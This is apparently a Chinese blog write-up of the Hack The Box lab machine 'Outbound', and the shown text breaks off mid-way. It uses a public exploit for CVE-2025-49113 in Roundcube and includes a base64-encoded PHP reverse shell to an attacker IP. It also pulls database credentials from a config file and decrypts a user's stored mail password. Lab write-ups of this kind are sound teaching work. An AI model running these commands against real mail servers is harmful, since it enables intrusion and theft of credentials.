

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fuk.png">
  <link rel="icon" href="https://img.dkdun.cn/v1/2025/12/c9ecee707ed47139.jpg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="butt3rf1y">
  <meta name="keywords" content="">
  
    <meta name="description" content="Outbound1As is common in real life pentests, you will start the Outbound box with credentials for the following account tyler &#x2F; LhKL1o9Nm3X2  信息收集nmap123456789PORT   STATE SERVICE VERSION22&#x2F;tcp open">
<meta property="og:type" content="article">
<meta property="og:title" content="HTB-OutBound">
<meta property="og:url" content="http://example.com/2025/07/17/HTB-OutBound/index.html">
<meta property="og:site_name" content="(｡･ω･｡)Welcome~">
<meta property="og:description" content="Outbound1As is common in real life pentests, you will start the Outbound box with credentials for the following account tyler &#x2F; LhKL1o9Nm3X2  信息收集nmap123456789PORT   STATE SERVICE VERSION22&#x2F;tcp open">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img.dkdun.cn/v1/2025/12/b00e2c9f9e3c0b8a.png">
<meta property="og:image" content="https://img.dkdun.cn/v1/2025/12/a5ef8ad3058315c8.png">
<meta property="og:image" content="https://img.dkdun.cn/v1/2025/12/bb20b62e5695198c.png">
<meta property="og:image" content="https://img.dkdun.cn/v1/2025/12/f6f1aa25c48d67ff.png">
<meta property="og:image" content="https://img.dkdun.cn/v1/2025/12/fd9d7ff2b1dcb30c.png">
<meta property="og:image" content="https://img.dkdun.cn/v1/2025/12/c780e77c3c20166a.png">
<meta property="article:published_time" content="2025-07-17T06:42:27.000Z">
<meta property="article:modified_time" content="2025-07-17T07:13:54.830Z">
<meta property="article:author" content="butt3rf1y">
<meta property="article:tag" content="below 提权 CVE-2025-49113、CVE-2025-27591">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://img.dkdun.cn/v1/2025/12/b00e2c9f9e3c0b8a.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>HTB-OutBound - (｡･ω･｡)Welcome~</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/glassBg.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":false,"loading_img":"/img/loading.gif","onlypost":true,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 80vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>butt3rf1y&#39;s Space</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="web_bg" style="
  background-image: url('https://img.dkdun.cn/v1/2025/12/250ec4831b1a4577.png');
  background-size: cover;
  background-position: center;
  background-attachment: fixed;
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  z-index: -1;
"></div>

<div id="banner" class="banner" parallax=true
     style="background: url('https://img.dkdun.cn/v1/2025/12/250ec4831b1a4577.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.1)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="HTB-OutBound"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-07-17 14:42" pubdate>
          2025年7月17日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.6k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          14 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        

      
    
  </div>


        
      </div>

      
        <div class="scroll-down-bar">
          <i class="iconfont icon-arrowdown"></i>
        </div>
      
    </div>
  </div>
</div>


</div>

	<link rel="icon" href="https://img.dkdun.cn/v1/2024/12/e40f2f1a8320e35c.png" type="image/x-icon">
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">HTB-OutBound</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    本文最后更新于 2025年7月17日 下午
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h1 id="Outbound"><a href="#Outbound" class="headerlink" title="Outbound"></a>Outbound</h1><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql"><span class="hljs-keyword">As</span> <span class="hljs-keyword">is</span> common <span class="hljs-keyword">in</span> <span class="hljs-type">real</span> life pentests, you will <span class="hljs-keyword">start</span> the Outbound <span class="hljs-type">box</span> <span class="hljs-keyword">with</span> credentials <span class="hljs-keyword">for</span> the <span class="hljs-keyword">following</span> account tyler / LhKL1o9Nm3X2<br></code></pre></td></tr></table></figure>

<h1 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h1><h2 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs bash">PORT   STATE SERVICE VERSION<br>22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)<br>| ssh-hostkey:<br>|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:<span class="hljs-built_in">df</span> (ECDSA)<br>|_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:<span class="hljs-built_in">df</span>:38:b0 (ED25519)<br>80/tcp open  http    nginx 1.24.0 (Ubuntu)<br>|_http-title: Did not follow redirect to http://mail.outbound.htb/<br>|_http-server-header: nginx/1.24.0 (Ubuntu)<br>No exact OS matches <span class="hljs-keyword">for</span> host (If you know what OS is running on it, see https://nmap.org/submit/ ).<br></code></pre></td></tr></table></figure>

<p>俩端口，有个子域名 <code>mail.outbound.htb</code></p>
<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><p>一个网页邮箱，RoundCube</p>
<img src="https://img.dkdun.cn/v1/2025/12/b00e2c9f9e3c0b8a.png" alt="image-20250715233225435" style="zoom:67%;" />

<p>用给的账号密码登录查看版本信息，发现是 1.6.10 ，查到有一个 RCE 漏洞，找到对应 CVE，CVE-2025-49113 - Roundcube Remote Code Execution</p>
<h1 id="CVE-2025-49113"><a href="#CVE-2025-49113" class="headerlink" title="CVE-2025-49113"></a>CVE-2025-49113</h1><p>这个漏洞需要先登录，然后发送包含恶意 <code>_from</code> 参数的 HTTP 请求来触发漏洞</p>
<p>POC：<a target="_blank" rel="noopener" href="https://github.com/hakaioffsec/CVE-2025-49113-exploit">https://github.com/hakaioffsec/CVE-2025-49113-exploit</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">php CVE-2025-49113.php &lt;url&gt; &lt;username&gt; &lt;password&gt; &lt;<span class="hljs-built_in">command</span>&gt;<br></code></pre></td></tr></table></figure>

<p>按照格式打，反弹 shell</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">php CVE-2025-49113.php http://mail.outbound.htb/ tyler <span class="hljs-string">&quot;LhKL1o9Nm3X2&quot;</span> <span class="hljs-string">&#x27;echo L3Vzci9iaW4vcGhwIC1yICckc29jaz1mc29ja29wZW4oIjEwLjEwLjE2LjQ1IiwxMjM0KTtleGVjKCIvYmluL2Jhc2ggPCYzID4mMyAyPiYzIik7Jw== | base64 -d | bash&#x27;</span><br></code></pre></td></tr></table></figure>

<p><img src="https://img.dkdun.cn/v1/2025/12/a5ef8ad3058315c8.png" alt="image-20250716000131046"></p>
<p>首先试了 sudo -l，但没用，在 tyler 用户下找到了关于数据库的东西</p>
<h1 id="利用数据库查找-session-中的-password"><a href="#利用数据库查找-session-中的-password" class="headerlink" title="利用数据库查找 session 中的 password"></a>利用数据库查找 session 中的 password</h1><p>在 <code>/var/www/html/roundcube/config</code> 目录下的 config.inc.php 文件发现了数据库相关配置</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-comment">/*</span><br><span class="hljs-comment"> +-----------------------------------------------------------------------+</span><br><span class="hljs-comment"> | Local configuration for the Roundcube Webmail installation.           |</span><br><span class="hljs-comment"> |                                                                       |</span><br><span class="hljs-comment"> | This is a sample configuration file only containing the minimum       |</span><br><span class="hljs-comment"> | setup required for a functional installation. Copy more options       |</span><br><span class="hljs-comment"> | from defaults.inc.php to this file to override the defaults.          |</span><br><span class="hljs-comment"> |                                                                       |</span><br><span class="hljs-comment"> | This file is part of the Roundcube Webmail client                     |</span><br><span class="hljs-comment"> | Copyright (C) The Roundcube Dev Team                                  |</span><br><span class="hljs-comment"> |                                                                       |</span><br><span class="hljs-comment"> | Licensed under the GNU General Public License version 3 or            |</span><br><span class="hljs-comment"> | any later version with exceptions for skins &amp; plugins.                |</span><br><span class="hljs-comment"> | See the README file for a full license statement.                     |</span><br><span class="hljs-comment"> +-----------------------------------------------------------------------+</span><br><span class="hljs-comment">*/</span><br><br><span class="hljs-variable">$config</span> = [];<br><br><span class="hljs-comment">// Database connection string (DSN) for read+write operations</span><br><span class="hljs-comment">// Format (compatible with PEAR MDB2): db_provider://user:password@host/database</span><br><span class="hljs-comment">// Currently supported db_providers: mysql, pgsql, sqlite, mssql, sqlsrv, oracle</span><br><span class="hljs-comment">// For examples see http://pear.php.net/manual/en/package.database.mdb2.intro-dsn.php</span><br><span class="hljs-comment">// <span class="hljs-doctag">NOTE:</span> for SQLite use absolute path (Linux): &#x27;sqlite:////full/path/to/sqlite.db?mode=0646&#x27;</span><br><span class="hljs-comment">//       or (Windows): &#x27;sqlite:///C:/full/path/to/sqlite.db&#x27;</span><br><span class="hljs-variable">$config</span>[<span class="hljs-string">&#x27;db_dsnw&#x27;</span>] = <span class="hljs-string">&#x27;mysql://roundcube:RCDBPass2025@localhost/roundcube&#x27;</span>;<br><br><span class="hljs-comment">// IMAP host chosen to perform the log-in.</span><br><span class="hljs-comment">// See defaults.inc.php for the option description.</span><br><span class="hljs-variable">$config</span>[<span class="hljs-string">&#x27;imap_host&#x27;</span>] = <span class="hljs-string">&#x27;localhost:143&#x27;</span>;<br><br><span class="hljs-comment">// SMTP server host (for sending mails).</span><br><span class="hljs-comment">// See defaults.inc.php for the option description.</span><br><span class="hljs-variable">$config</span>[<span class="hljs-string">&#x27;smtp_host&#x27;</span>] = <span class="hljs-string">&#x27;localhost:587&#x27;</span>;<br><br><span class="hljs-comment">// SMTP username (if required) if you use %u as the username Roundcube</span><br><span class="hljs-comment">// will use the current username for login</span><br><span class="hljs-variable">$config</span>[<span class="hljs-string">&#x27;smtp_user&#x27;</span>] = <span class="hljs-string">&#x27;%u&#x27;</span>;<br><br><span class="hljs-comment">// SMTP password (if required) if you use %p as the password Roundcube</span><br><span class="hljs-comment">// will use the current user&#x27;s password for login</span><br><span class="hljs-variable">$config</span>[<span class="hljs-string">&#x27;smtp_pass&#x27;</span>] = <span class="hljs-string">&#x27;%p&#x27;</span>;<br><br><span class="hljs-comment">// provide an URL where a user can get support for this Roundcube installation</span><br><span class="hljs-comment">// PLEASE DO NOT LINK TO THE ROUNDCUBE.NET WEBSITE HERE!</span><br><span class="hljs-variable">$config</span>[<span class="hljs-string">&#x27;support_url&#x27;</span>] = <span class="hljs-string">&#x27;&#x27;</span>;<br><br><span class="hljs-comment">// Name your service. This is displayed on the login screen and in the window title</span><br><span class="hljs-variable">$config</span>[<span class="hljs-string">&#x27;product_name&#x27;</span>] = <span class="hljs-string">&#x27;Roundcube Webmail&#x27;</span>;<br><br><span class="hljs-comment">// This key is used to encrypt the users imap password which is stored</span><br><span class="hljs-comment">// in the session record. For the default cipher method it must be</span><br><span class="hljs-comment">// exactly 24 characters long.</span><br><span class="hljs-comment">// YOUR KEY MUST BE DIFFERENT THAN THE SAMPLE VALUE FOR SECURITY REASONS</span><br><span class="hljs-variable">$config</span>[<span class="hljs-string">&#x27;des_key&#x27;</span>] = <span class="hljs-string">&#x27;rcmail-!24ByteDESkey*Str&#x27;</span>;<br><br><span class="hljs-comment">// List of active plugins (in plugins/ directory)</span><br><span class="hljs-variable">$config</span>[<span class="hljs-string">&#x27;plugins&#x27;</span>] = [<br>    <span class="hljs-string">&#x27;archive&#x27;</span>,<br>    <span class="hljs-string">&#x27;zipdownload&#x27;</span>,<br>];<br><br><span class="hljs-comment">// skin name: folder from skins/</span><br><span class="hljs-variable">$config</span>[<span class="hljs-string">&#x27;skin&#x27;</span>] = <span class="hljs-string">&#x27;elastic&#x27;</span>;<br><span class="hljs-variable">$config</span>[<span class="hljs-string">&#x27;default_host&#x27;</span>] = <span class="hljs-string">&#x27;localhost&#x27;</span>;<br><span class="hljs-variable">$config</span>[<span class="hljs-string">&#x27;smtp_server&#x27;</span>] = <span class="hljs-string">&#x27;localhost&#x27;</span>;<br></code></pre></td></tr></table></figure>

<p>根据信息登录数据库</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$config</span>[<span class="hljs-string">&#x27;db_dsnw&#x27;</span>] = <span class="hljs-string">&#x27;mysql://roundcube:RCDBPass2025@localhost/roundcube&#x27;</span>;<br></code></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mysql">mysql -u roundcube -pRCDBPass2025 -h localhost roundcube -e &#x27;show databases;&#x27; -E<br></code></pre></td></tr></table></figure>

<p>使用 roundcube 数据库</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs mysql">Database<br>information_schema<br>roundcube<br>Tables_in_roundcube<br>cache<br>cache_index<br>cache_messages<br>cache_shared<br>cache_thread<br>collected_addresses<br>contactgroupmembers<br>contactgroups<br>contacts<br>dictionary<br>filestore<br>identities<br>responses<br>searches<br>session<br>system<br>users<br></code></pre></td></tr></table></figure>

<p>查询后发现有这些表，先看的 users 表，但是没有密码，查看 session 表</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mysql">mysql -u roundcube -pRCDBPass2025 -h localhost roundcube -e &#x27;use roundcube;select * from session;&#x27; -E<br></code></pre></td></tr></table></figure>

<p>解密 session 的 var 字段</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">language|s:<span class="hljs-number">5</span>:<span class="hljs-string">&quot;en_US&quot;</span>;imap_namespace|a:<span class="hljs-number">4</span>:&#123;s:<span class="hljs-number">8</span>:<span class="hljs-string">&quot;personal&quot;</span>;a:<span class="hljs-number">1</span>:&#123;i:<span class="hljs-number">0</span>;a:<span class="hljs-number">2</span>:&#123;i:<span class="hljs-number">0</span>;s:<span class="hljs-number">0</span>:<span class="hljs-string">&quot;&quot;</span>;i:<span class="hljs-number">1</span>;s:<span class="hljs-number">1</span>:<span class="hljs-string">&quot;/&quot;</span>;&#125;&#125;s:<span class="hljs-number">5</span>:<span class="hljs-string">&quot;other&quot;</span>;N;s:<span class="hljs-number">6</span>:<span class="hljs-string">&quot;shared&quot;</span>;N;s:<span class="hljs-number">10</span>:<span class="hljs-string">&quot;prefix_out&quot;</span>;s:<span class="hljs-number">0</span>:<span class="hljs-string">&quot;&quot;</span>;&#125;imap_delimiter|s:<span class="hljs-number">1</span>:<span class="hljs-string">&quot;/&quot;</span>;imap_list_conf|a:<span class="hljs-number">2</span>:&#123;i:<span class="hljs-number">0</span>;N;i:<span class="hljs-number">1</span>;a:<span class="hljs-number">0</span>:&#123;&#125;&#125;user_id|i:<span class="hljs-number">1</span>;username|s:<span class="hljs-number">5</span>:<span class="hljs-string">&quot;jacob&quot;</span>;storage_host|s:<span class="hljs-number">9</span>:<span class="hljs-string">&quot;localhost&quot;</span>;storage_port|i:<span class="hljs-number">143</span>;storage_ssl|b:<span class="hljs-number">0</span>;password|s:<span class="hljs-number">32</span>:<span class="hljs-string">&quot;L7Rv00A8TuwJAr67kITxxcSgnIk25Am/&quot;</span>;login_time|i:<span class="hljs-number">1749397119</span>;timezone|s:<span class="hljs-number">13</span>:<span class="hljs-string">&quot;Europe/London&quot;</span>;STORAGE_SPECIAL-USE|b:<span class="hljs-number">1</span>;auth_secret|s:<span class="hljs-number">26</span>:<span class="hljs-string">&quot;DpYqv6maI9HxDL5GhcCd8JaQQW&quot;</span>;request_token|s:<span class="hljs-number">32</span>:<span class="hljs-string">&quot;TIsOaABA1zHSXZOBpH6up5XFyayNRHaw&quot;</span>;task|s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;mail&quot;</span>;skin_config|a:<span class="hljs-number">7</span>:&#123;s:<span class="hljs-number">17</span>:<span class="hljs-string">&quot;supported_layouts&quot;</span>;a:<span class="hljs-number">1</span>:&#123;i:<span class="hljs-number">0</span>;s:<span class="hljs-number">10</span>:<span class="hljs-string">&quot;widescreen&quot;</span>;&#125;s:<span class="hljs-number">22</span>:<span class="hljs-string">&quot;jquery_ui_colors_theme&quot;</span>;s:<span class="hljs-number">9</span>:<span class="hljs-string">&quot;bootstrap&quot;</span>;s:<span class="hljs-number">18</span>:<span class="hljs-string">&quot;embed_css_location&quot;</span>;s:<span class="hljs-number">17</span>:<span class="hljs-string">&quot;/styles/embed.css&quot;</span>;s:<span class="hljs-number">19</span>:<span class="hljs-string">&quot;editor_css_location&quot;</span>;s:<span class="hljs-number">17</span>:<span class="hljs-string">&quot;/styles/embed.css&quot;</span>;s:<span class="hljs-number">17</span>:<span class="hljs-string">&quot;dark_mode_support&quot;</span>;b:<span class="hljs-number">1</span>;s:<span class="hljs-number">26</span>:<span class="hljs-string">&quot;media_browser_css_location&quot;</span>;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;none&quot;</span>;s:<span class="hljs-number">21</span>:<span class="hljs-string">&quot;additional_logo_types&quot;</span>;a:<span class="hljs-number">3</span>:&#123;i:<span class="hljs-number">0</span>;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;dark&quot;</span>;i:<span class="hljs-number">1</span>;s:<span class="hljs-number">5</span>:<span class="hljs-string">&quot;small&quot;</span>;i:<span class="hljs-number">2</span>;s:<span class="hljs-number">10</span>:<span class="hljs-string">&quot;small-dark&quot;</span>;&#125;&#125;imap_host|s:<span class="hljs-number">9</span>:<span class="hljs-string">&quot;localhost&quot;</span>;page|i:<span class="hljs-number">1</span>;mbox|s:<span class="hljs-number">5</span>:<span class="hljs-string">&quot;INBOX&quot;</span>;sort_col|s:<span class="hljs-number">0</span>:<span class="hljs-string">&quot;&quot;</span>;sort_order|s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;DESC&quot;</span>;STORAGE_THREAD|a:<span class="hljs-number">3</span>:&#123;i:<span class="hljs-number">0</span>;s:<span class="hljs-number">10</span>:<span class="hljs-string">&quot;REFERENCES&quot;</span>;i:<span class="hljs-number">1</span>;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;REFS&quot;</span>;i:<span class="hljs-number">2</span>;s:<span class="hljs-number">14</span>:<span class="hljs-string">&quot;ORDEREDSUBJECT&quot;</span>;&#125;STORAGE_QUOTA|b:<span class="hljs-number">0</span>;STORAGE_LIST-EXTENDED|b:<span class="hljs-number">1</span>;list_attrib|a:<span class="hljs-number">6</span>:&#123;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;name&quot;</span>;s:<span class="hljs-number">8</span>:<span class="hljs-string">&quot;messages&quot;</span>;s:<span class="hljs-number">2</span>:<span class="hljs-string">&quot;id&quot;</span>;s:<span class="hljs-number">11</span>:<span class="hljs-string">&quot;messagelist&quot;</span>;s:<span class="hljs-number">5</span>:<span class="hljs-string">&quot;class&quot;</span>;s:<span class="hljs-number">42</span>:<span class="hljs-string">&quot;listing messagelist sortheader fixedheader&quot;</span>;s:<span class="hljs-number">15</span>:<span class="hljs-string">&quot;aria-labelledby&quot;</span>;s:<span class="hljs-number">22</span>:<span class="hljs-string">&quot;aria-label-messagelist&quot;</span>;s:<span class="hljs-number">9</span>:<span class="hljs-string">&quot;data-list&quot;</span>;s:<span class="hljs-number">12</span>:<span class="hljs-string">&quot;message_list&quot;</span>;s:<span class="hljs-number">14</span>:<span class="hljs-string">&quot;data-label-msg&quot;</span>;s:<span class="hljs-number">18</span>:<span class="hljs-string">&quot;The list is empty.&quot;</span>;&#125;unseen_count|a:<span class="hljs-number">2</span>:&#123;s:<span class="hljs-number">5</span>:<span class="hljs-string">&quot;INBOX&quot;</span>;i:<span class="hljs-number">2</span>;s:<span class="hljs-number">5</span>:<span class="hljs-string">&quot;Trash&quot;</span>;i:<span class="hljs-number">0</span>;&#125;folders|a:<span class="hljs-number">1</span>:&#123;s:<span class="hljs-number">5</span>:<span class="hljs-string">&quot;INBOX&quot;</span>;a:<span class="hljs-number">2</span>:&#123;s:<span class="hljs-number">3</span>:<span class="hljs-string">&quot;cnt&quot;</span>;i:<span class="hljs-number">2</span>;s:<span class="hljs-number">6</span>:<span class="hljs-string">&quot;maxuid&quot;</span>;i:<span class="hljs-number">3</span>;&#125;&#125;list_mod_seq|s:<span class="hljs-number">2</span>:<span class="hljs-string">&quot;10&quot;</span>;<br></code></pre></td></tr></table></figure>

<p>有用户 <code>jacob</code> 的信息，password 和 auth_secret</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php">password|s:<span class="hljs-number">32</span>:<span class="hljs-string">&quot;L7Rv00A8TuwJAr67kITxxcSgnIk25Am/&quot;</span><br>auth_secret|s:<span class="hljs-number">26</span>:<span class="hljs-string">&quot;DpYqv6maI9HxDL5GhcCd8JaQQW&quot;</span><br></code></pre></td></tr></table></figure>

<h1 id="Decrypt-Password"><a href="#Decrypt-Password" class="headerlink" title="Decrypt Password"></a>Decrypt Password</h1><p>在 <code>/var/www/html/roundcube/bin</code> 下有一个 decrypt.sh可以直接解密了</p>
<p><img src="https://img.dkdun.cn/v1/2025/12/bb20b62e5695198c.png" alt="image-20250716011112828"></p>
<p>拿到密码 <code>595mO8DmwGeD</code></p>
<p>同样可以用另一种方法解密：</p>
<p>在 <a target="_blank" rel="noopener" href="https://github.com/roundcube/roundcubemail/blob/master/program/lib/Roundcube/rcube.php">https://github.com/roundcube/roundcubemail/blob/master/program/lib/Roundcube/rcube.php</a> 找到了相关解密函数</p>
